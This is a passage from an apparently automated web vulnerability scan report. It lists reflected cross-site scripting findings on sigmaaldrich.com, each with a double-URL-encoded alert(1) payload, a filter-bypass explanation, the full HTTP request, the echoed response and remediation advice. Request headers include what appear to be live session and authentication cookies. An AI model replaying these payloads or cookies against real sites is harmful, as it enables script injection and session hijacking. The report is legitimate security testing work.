Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:19 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/help/help-welcome/ordering-product/23722";alert(1)//5c1450bf436","E404") ;
   </script>
...[SNIP]...

1.614. http://www.sigmaaldrich.com/sigma-aldrich/home.cookies.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/home.cookies.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 137a2%2522%253balert%25281%2529%252f%252fa0e77db71 was submitted in the REST URL parameter 1. This input was echoed as 137a2";alert(1)//a0e77db71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich137a2%2522%253balert%25281%2529%252f%252fa0e77db71/home.cookies.js?change=null&id=1289929994919 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:59 GMT
Connection: close
Set-Cookie: JSESSIONID=074a7fe4-5fa3-574f-8f92-3618e73c9a2e;Path=/
Content-Length: 28931


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich137a2";alert(1)//a0e77db71/home.cookies.js","E404") ;
   </script>
...[SNIP]...

1.615. http://www.sigmaaldrich.com/sigma-aldrich/home.cookies.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/home.cookies.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d322d%2522%253balert%25281%2529%252f%252fee1888400a was submitted in the REST URL parameter 2. This input was echoed as d322d";alert(1)//ee1888400a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/d322d%2522%253balert%25281%2529%252f%252fee1888400a?change=null&id=1289929994919 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:02 GMT
Connection: close
Set-Cookie: JSESSIONID=16a9b8c1-e049-9640-80ba-e5fe2c8a438f;Path=/
Content-Length: 28917


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/d322d";alert(1)//ee1888400a","E404") ;
   </script>
...[SNIP]...

1.616. http://www.sigmaaldrich.com/sigma-aldrich/home.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/home.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59ccd%2522%253balert%25281%2529%252f%252f473b1816d82 was submitted in the REST URL parameter 1. This input was echoed as 59ccd";alert(1)//473b1816d82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich59ccd%2522%253balert%25281%2529%252f%252f473b1816d82/home.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.bing.com/search?q=sigma-aldrich&src=IE-SearchBox&FORM=IE8SRC
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:57 GMT
Connection: close
Set-Cookie: JSESSIONID=6052cd7d-2bdf-2842-824b-d1623a7fa084;Path=/
Content-Length: 28927


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich59ccd";alert(1)//473b1816d82/home.html","E404") ;
   </script>
...[SNIP]...

1.617. http://www.sigmaaldrich.com/sigma-aldrich/home.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/home.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3295%2522%253balert%25281%2529%252f%252f4623e0279e6 was submitted in the REST URL parameter 2. This input was echoed as a3295";alert(1)//4623e0279e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/a3295%2522%253balert%25281%2529%252f%252f4623e0279e6 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.bing.com/search?q=sigma-aldrich&src=IE-SearchBox&FORM=IE8SRC
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:59 GMT
Connection: close
Set-Cookie: JSESSIONID=12769bb4-7cef-6841-815f-e898c574e4b1;Path=/
Content-Length: 28918


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/a3295";alert(1)//4623e0279e6","E404") ;
   </script>
...[SNIP]...

1.618. http://www.sigmaaldrich.com/sigma-aldrich/home/remember.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/home/remember.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f5f3%2522%253balert%25281%2529%252f%252ff40942c501d was submitted in the REST URL parameter 1. This input was echoed as 9f5f3";alert(1)//f40942c501d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich9f5f3%2522%253balert%25281%2529%252f%252ff40942c501d/home/remember.html?Country=United+States&Code=USA&Page=HP&SO=US HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=&t1=1289930569827&t2=1289930570045&t3=1289930573399&lti=1289930573399&ln=&hr=/sigma-aldrich/home/remember.html%3FCountry%3DUnited+States%26Code%3DUSA%26Page%3DHP%26SO%3DUS&fti=&fn=form1%3A0%3B&ac=&fd=&uer=&fu=&pi=/sigma-aldrich/home.html&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934&ul=http%3A//www.sigmaaldrich.com/sigma-aldrich/home.html&rf=http%3A//www.bing.com/search%3Fq%3Dsigma-aldrich%26src%3DIE-SearchBox%26FORM%3DIE8SRC

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:04 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28936


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich9f5f3";alert(1)//f40942c501d/home/remember.html","E404") ;
   </script>
...[SNIP]...

1.619. http://www.sigmaaldrich.com/sigma-aldrich/home/remember.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/home/remember.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78a78%2522%253balert%25281%2529%252f%252fda047cff439 was submitted in the REST URL parameter 2. This input was echoed as 78a78";alert(1)//da047cff439 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/home78a78%2522%253balert%25281%2529%252f%252fda047cff439/remember.html?Country=United+States&Code=USA&Page=HP&SO=US HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=&t1=1289930569827&t2=1289930570045&t3=1289930573399&lti=1289930573399&ln=&hr=/sigma-aldrich/home/remember.html%3FCountry%3DUnited+States%26Code%3DUSA%26Page%3DHP%26SO%3DUS&fti=&fn=form1%3A0%3B&ac=&fd=&uer=&fu=&pi=/sigma-aldrich/home.html&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934&ul=http%3A//www.sigmaaldrich.com/sigma-aldrich/home.html&rf=http%3A//www.bing.com/search%3Fq%3Dsigma-aldrich%26src%3DIE-SearchBox%26FORM%3DIE8SRC

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:07 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28936


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/home78a78";alert(1)//da047cff439/remember.html","E404") ;
   </script>
...[SNIP]...

1.620. http://www.sigmaaldrich.com/sigma-aldrich/home/remember.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/home/remember.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ce0f%2522%253balert%25281%2529%252f%252f52560ae4772 was submitted in the REST URL parameter 3. This input was echoed as 3ce0f";alert(1)//52560ae4772 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/home/3ce0f%2522%253balert%25281%2529%252f%252f52560ae4772 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:13 GMT
Content-Length: 28923
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/home/3ce0f";alert(1)//52560ae4772","E404") ;
   </script>
...[SNIP]...

1.621. http://www.sigmaaldrich.com/site-level/career-opportunites.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/career-opportunites.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 136f5%2522%253balert%25281%2529%252f%252f844bb64fe02 was submitted in the REST URL parameter 1. This input was echoed as 136f5";alert(1)//844bb64fe02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level136f5%2522%253balert%25281%2529%252f%252f844bb64fe02/career-opportunites.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
